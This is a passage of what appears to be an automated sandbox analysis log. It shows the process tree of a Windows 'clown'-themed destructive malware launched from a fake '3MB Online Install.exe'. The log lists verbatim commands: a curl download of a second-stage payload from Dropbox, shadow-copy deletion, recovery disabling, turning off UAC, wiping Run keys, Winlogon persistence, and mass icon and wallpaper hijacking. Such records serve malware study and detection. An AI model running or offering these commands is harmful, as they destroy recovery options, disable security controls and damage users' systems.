        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Word.Document.8\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:5000
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Word.Document.12\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:812
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Word.RTF.8\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:4120
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\wordhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:6032
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\wordhtmltemplate\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:5228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\wordmhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:3996
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Wordpad.Document.1\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:5836
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\wordxmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:5444
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\uTorrent\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:5856
        
        C:\Windows\system32\ie4uinit.exe
        
        ie4uinit.exe -show
        12⤵
        Modifies Installed Components in the registry
        Modifies Internet Explorer settings
        
        PID:5500
        
        C:\Windows\system32\ie4uinit.exe
        
        ie4uinit.exe -show
        8⤵
        Modifies Installed Components in the registry
        Modifies Internet Explorer settings
        
        PID:1788
        
        C:\java\protection\start\starthosts.exe
        
        C:\java\protection\start\starthosts.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5804
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E1E5.tmp\E1E5.tmp\E1E6.bat C:\java\protection\start\starthosts.exe"
        9⤵
        
        PID:6048
        
        C:\java\ban\hosts.exe
        
        C:\java\ban\hosts.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5504
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E56E.tmp\E56F.tmp\E570.bat C:\java\ban\hosts.exe"
        11⤵
        Drops file in Drivers directory
        
        PID:5660
        
        C:\java\protection\start\startWPChanger.exe
        
        C:\java\protection\start\startWPChanger.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5848
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E1E4.tmp\E1E5.tmp\E1E6.bat C:\java\protection\start\startWPChanger.exe"
        9⤵
        
        PID:1996
        
        C:\java\Wallpaper\WPChanger.exe
        
        C:\java\Wallpaper\WPChanger.exe C:\java\Wallpaper\clown.png
        10⤵
        Executes dropped EXE
        Sets desktop wallpaper using registry
        Modifies Control Panel
        
        PID:5024
        
        C:\java\clown.exe
        
        C:\java\clown.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5860
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E203.tmp\E204.tmp\E205.bat C:\java\clown.exe"
        9⤵
        
        PID:6040
        
        C:\java\protection\start\startvol.exe
        
        C:\java\protection\start\startvol.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6128
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E484.tmp\E485.tmp\E486.bat C:\java\protection\start\startvol.exe"
        11⤵
        
        PID:5420
        
        C:\java\vol.exe
        
        C:\java\vol.exe
        12⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4084
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ECF0.tmp\ECF1.tmp\ECF2.bat C:\java\vol.exe"
        13⤵
        
        PID:5640
        
        C:\Windows\system32\wscript.exe
        
        wscript.exe "C:\java\vol.vbs"
        14⤵
        
        PID:6000
        
        C:\Windows\system32\wscript.exe
        
        wscript.exe "C:\java\morgalka.vbs"
        14⤵
        
        PID:4532
        
        C:\java\protection\start\startScreenBlocker.exe
        
        C:\java\protection\start\startScreenBlocker.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6136
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E485.tmp\E485.tmp\E486.bat C:\java\protection\start\startScreenBlocker.exe"
        11⤵
        
        PID:5632
        
        C:\java\ban\ScreenBlocker.exe
        
        C:\java\ban\ScreenBlocker.exe
        12⤵
        Executes dropped EXE
        
        PID:4664
        
        C:\java\protection\start\startcur.exe
        
        C:\java\protection\start\startcur.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1064
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E493.tmp\E494.tmp\E495.bat C:\java\protection\start\startcur.exe"
        11⤵
        
        PID:5564
        
        C:\java\ban\cur.exe
        
        C:\java\ban\cur.exe
        12⤵
        Executes dropped EXE
        
        PID:4876
        
        C:\java\attention.exe
        
        C:\java\attention.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1428
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E4C2.tmp\E4C3.tmp\E4C4.bat C:\java\attention.exe"
        11⤵
        
        PID:5676
        
        C:\java\form.exe
        
        C:\java\form.exe
        12⤵
        Executes dropped EXE
        
        PID:5824
        
        C:\Windows\system32\timeout.exe
        
        timeout -t 10 -nobreak
        12⤵
        Delays execution with timeout.exe
        
        PID:5324
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im form.exe
        12⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5880
        
        C:\Windows\system32\ReAgentc.exe
        
        reagentc /disable
        10⤵
        Drops file in Windows directory
        
        PID:4948
        
        C:\java\protection\start\startWinlog.exe
        
        C:\java\protection\start\startWinlog.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4132
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E743.tmp\E744.tmp\E745.bat C:\java\protection\start\startWinlog.exe"
        11⤵
        
        PID:3336
        
        C:\java\protection\Winlog.exe
        
        C:\java\protection\Winlog.exe
        12⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        
        PID:3944
        
        C:\java\protection\start\startf.exe
        
        C:\java\protection\start\startf.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3004
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E744.tmp\E744.tmp\E745.bat C:\java\protection\start\startf.exe"
        11⤵
        
        PID:2252
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:5840
        
        C:\java\f\f.exe
        
        C:\java\f\f.exe
        12⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1788
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F2BC.tmp\F2CD.tmp\F2CE.bat C:\java\f\f.exe"
        13⤵
        
        PID:3800
        
        C:\java\protection\start\startban.exe
        
        C:\java\protection\start\startban.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4492
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E781.tmp\E782.tmp\E783.bat C:\java\protection\start\startban.exe"
        11⤵
        
        PID:380
        
        C:\java\ban\ban.exe
        
        C:\java\ban\ban.exe
        12⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4468
        
        C:\java\ban\ban.exe
        
        C:\java\ban\ban.exe
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:5140
        
        C:\java\Wallpaper\engine\wp.exe
        
        wp id
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2972
        
        C:\java\Wallpaper\engine\wp.exe
        
        wp run mpv --wid=131778 C:\java\Wallpaper\engine\wallpapers\1.mp4 --loop=inf --player-operation-mode=pseudo-gui --force-window=yes
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6004
        
        C:\java\Wallpaper\engine\mpv.com
        
        "C:\java\Wallpaper\engine\mpv.com" "--wid=131778" "C:\java\Wallpaper\engine\wallpapers\1.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"
        11⤵
        Executes dropped EXE
        
        PID:5224
        
        C:\java\Wallpaper\engine\mpv.exe
        
        "C:\java\Wallpaper\engine\mpv.com" "--wid=131778" "C:\java\Wallpaper\engine\wallpapers\1.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"
        12⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:5436
        
        C:\java\hide.exe
        
        C:\java\hide.exe
        10⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:5708
        
        C:\Windows\system32\timeout.exe
        
        timeout -t 20 -nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:5604
        
        C:\java\hide.exe
        
        C:\java\hide.exe
        10⤵
        Suspicious use of FindShellTrayWindow
        
        PID:5036
        
        C:\Windows\system32\timeout.exe
        
        timeout -t 20 -nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:3548
        
        C:\java\hide.exe
        
        C:\java\hide.exe
        10⤵
        Suspicious use of FindShellTrayWindow
        
        PID:3304
        
        C:\Windows\system32\timeout.exe
        
        timeout -t 20 -nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:952
        
        C:\java\hide.exe
        
        C:\java\hide.exe
        10⤵
        Suspicious use of FindShellTrayWindow
        
        PID:480
        
        C:\Windows\system32\timeout.exe
        
        timeout -t 13 -nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:5632
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.exe
        10⤵
        Kills process with taskkill
        
        PID:4120
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.com
        10⤵
        Kills process with taskkill
        
        PID:3020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.exe
        10⤵
        Kills process with taskkill
        
        PID:2148
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.com
        10⤵
        Kills process with taskkill
        
        PID:5612
        
        C:\java\video\VideoPlayer.exe
        
        C:\java\video\VideoPlayer.exe C:\java\video\1.mp4
        10⤵
        Loads dropped DLL
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        
        PID:4800
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM VideoPlayer.exe
        10⤵
        Kills process with taskkill
        
        PID:4960
        
        C:\java\Wallpaper\engine\wp.exe
        
        wp run mpv --wid=131778 C:\java\Wallpaper\engine\wallpapers\2.mp4 --loop=inf --player-operation-mode=pseudo-gui --force-window=yes
        10⤵
        
        PID:3112
        
        C:\java\Wallpaper\engine\mpv.com
        
        "C:\java\Wallpaper\engine\mpv.com" "--wid=131778" "C:\java\Wallpaper\engine\wallpapers\2.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"
        11⤵
        
        PID:3400
        
        C:\java\Wallpaper\engine\mpv.exe
        
        "C:\java\Wallpaper\engine\mpv.com" "--wid=131778" "C:\java\Wallpaper\engine\wallpapers\2.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"
        12⤵
        Suspicious use of FindShellTrayWindow
        
        PID:1844
        
        C:\java\hide.exe
        
        C:\java\hide.exe
        10⤵
        Suspicious use of FindShellTrayWindow
        
        PID:5792
        
        C:\Windows\system32\timeout.exe
        
        timeout -t 22 -nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:5224
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.exe
        10⤵
        Kills process with taskkill
        
        PID:4836
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.com
        10⤵
        Kills process with taskkill
        
        PID:3140
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.exe
        10⤵
        Kills process with taskkill
        
        PID:2104
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.com
        10⤵
        Kills process with taskkill
        
        PID:2824
        
        C:\java\video\VideoPlayer.exe
        
        C:\java\video\VideoPlayer.exe C:\java\video\2.mp4
        10⤵
        Loads dropped DLL
        Enumerates connected drives
        
        PID:8
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,7724563417088901123,10205760120393203350,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
  2⤵
  PID:1468
- C:\Users\Admin\Downloads\3MB Online Install.exe
  "C:\Users\Admin\Downloads\3MB Online Install.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3040
- - C:\ProgramData\Drivers\Start.exe
    "C:\ProgramData\Drivers\Start.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2300
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C340.tmp\C341.tmp\C342.bat C:\ProgramData\Drivers\Start.exe"
      4⤵
      PID:2664
    - - C:\ProgramData\Drivers\curl.exe
        
        C:\ProgramData\Drivers\Curl.exe -L -o "C:\ProgramData\Drivers\Driver.exe" "https://www.dropbox.com/s/kws6z5mk9d0t52b/HD0Killer0Clown02.6.exe?dl=1"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1612
    - - C:\ProgramData\Drivers\Driver.exe
        
        "C:\ProgramData\Drivers\Driver.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1752
      - C:\java\protection\clown.exe
        
        "C:\java\protection\clown.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4040
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\177B.tmp\177C.tmp\177D.bat C:\java\protection\clown.exe"
        7⤵
        
        PID:5300
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:6068
        
        C:\java\protection\start\startban.exe
        
        C:\java\protection\start\startban.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1996
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1865.tmp\1866.tmp\1867.bat C:\java\protection\start\startban.exe"
        9⤵
        
        PID:5296
        
        C:\java\ban\ban.exe
        
        C:\java\ban\ban.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6012
        
        C:\java\ban\ban.exe
        
        C:\java\ban\ban.exe
        11⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:5524
        
        C:\java\protection\def.exe
        
        C:\java\protection\def.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5768
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1866.tmp\1866.tmp\1877.bat C:\java\protection\def.exe"
        9⤵
        
        PID:2300
        
        C:\java\protection\DisDef.exe
        
        C:\java\protection\DisDef.exe /D
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5520
        
        C:\java\protection\start\startcur.exe
        
        C:\java\protection\start\startcur.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5036
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1867.tmp\1866.tmp\1867.bat C:\java\protection\start\startcur.exe"
        9⤵
        
        PID:5000
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:4120
        
        C:\java\ban\cur.exe
        
        C:\java\ban\cur.exe
        10⤵
        
        PID:1676
        
        C:\java\protection\start\startkey.exe
        
        C:\java\protection\start\startkey.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5868
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1875.tmp\1876.tmp\1877.bat C:\java\protection\start\startkey.exe"
        9⤵
        
        PID:2144
        
        C:\java\ban\key.exe
        
        C:\java\ban\key.exe
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5680
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1A78.tmp\1A79.tmp\1A7A.bat C:\java\ban\key.exe"
        11⤵
        
        PID:3128
        
        C:\Windows\system32\reg.exe
        
        reg import C:\java\ban\key.reg
        12⤵
        
        PID:1752
        
        C:\Windows\system32\ReAgentc.exe
        
        reagentc /disable
        8⤵
        Drops file in Windows directory
        
        PID:1632
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete /nointeractive
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5320
        
        C:\java\zip\7z.exe
        
        C:\java\zip\7z.exe a -tzip -mx1 -r0 C:\ProgramData\WindowsVersion\archive.zip C:\java
        8⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:5216
        
        C:\java\protection\start\startdelstartup.exe
        
        C:\java\protection\start\startdelstartup.exe
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5688
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2AB5.tmp\2AB6.tmp\2AB7.bat C:\java\protection\start\startdelstartup.exe"
        9⤵
        
        PID:5220
        
        C:\java\protection\delstartup.exe
        
        C:\java\protection\delstartup.exe
        10⤵
        
        PID:6048
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2CA9.tmp\2CAA.tmp\2CAB.bat C:\java\protection\delstartup.exe"
        11⤵
        
        PID:5780
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /va /f
        12⤵
        
        PID:996
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /va /f
        12⤵
        
        PID:5932
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" /va /f
        12⤵
        
        PID:5704
        
        C:\java\protection\start\startuac.exe
        
        C:\java\protection\start\startuac.exe
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5444
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2AB6.tmp\2AB6.tmp\2AB7.bat C:\java\protection\start\startuac.exe"
        9⤵
        
        PID:1676
        
        C:\java\protection\uac.exe
        
        C:\java\protection\uac.exe
        10⤵
        
        PID:5428
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2CE7.tmp\2CE8.tmp\2CE9.bat C:\java\protection\uac.exe"
        11⤵
        
        PID:3800
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:2600
        
        C:\Windows\system32\reg.exe
        
        reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        12⤵
        UAC bypass
        Modifies registry key
        
        PID:644
        
        C:\java\protection\start\startauto.exe
        
        C:\java\protection\start\startauto.exe
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5740
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2AA5.tmp\2AA6.tmp\2AA7.bat C:\java\protection\start\startauto.exe"
        9⤵
        
        PID:2112
        
        C:\java\protection\auto.exe
        
        C:\java\protection\auto.exe
        10⤵
        
        PID:2684
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2CD7.tmp\2CD8.tmp\2CD9.bat C:\java\protection\auto.exe"
        11⤵
        Drops startup file
        
        PID:5092
        
        C:\java\protection\start\startWinlog.exe
        
        C:\java\protection\start\startWinlog.exe
        8⤵
        
        PID:5460
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2AA6.tmp\2AA6.tmp\2AA7.bat C:\java\protection\start\startWinlog.exe"
        9⤵
        
        PID:340
        
        C:\java\protection\Winlog.exe
        
        C:\java\protection\Winlog.exe
        10⤵
        Modifies WinLogon for persistence
        
        PID:2372
        
        C:\java\protection\start\startExplorerIcons.exe
        
        C:\java\protection\start\startExplorerIcons.exe
        8⤵
        
        PID:5788
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2AF3.tmp\2AF4.tmp\2AF5.bat C:\java\protection\start\startExplorerIcons.exe"
        9⤵
        
        PID:5212
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:1668
        
        C:\java\protection\ExplorerIcons.exe
        
        C:\java\protection\ExplorerIcons.exe
        10⤵
        
        PID:5136
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2CF7.tmp\2CF8.tmp\2CF9.bat C:\java\protection\ExplorerIcons.exe"
        11⤵
        
        PID:5652
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:2252
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 1 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4728
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 2 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5988
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 3 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:6000
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 4 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:672
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 5 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:6024
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 6 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5820
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 7 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5608
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 8 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5916
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 9 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5512
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 10 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5172
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 11 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3504
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 12 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5704
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 13 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:3564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 14 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5820
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 15 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3092
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 16 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3352
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 17 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5456
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 18 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5512
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 19 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3800
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 20 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5844
        
        C:\Windows\system32\reg.exe
        
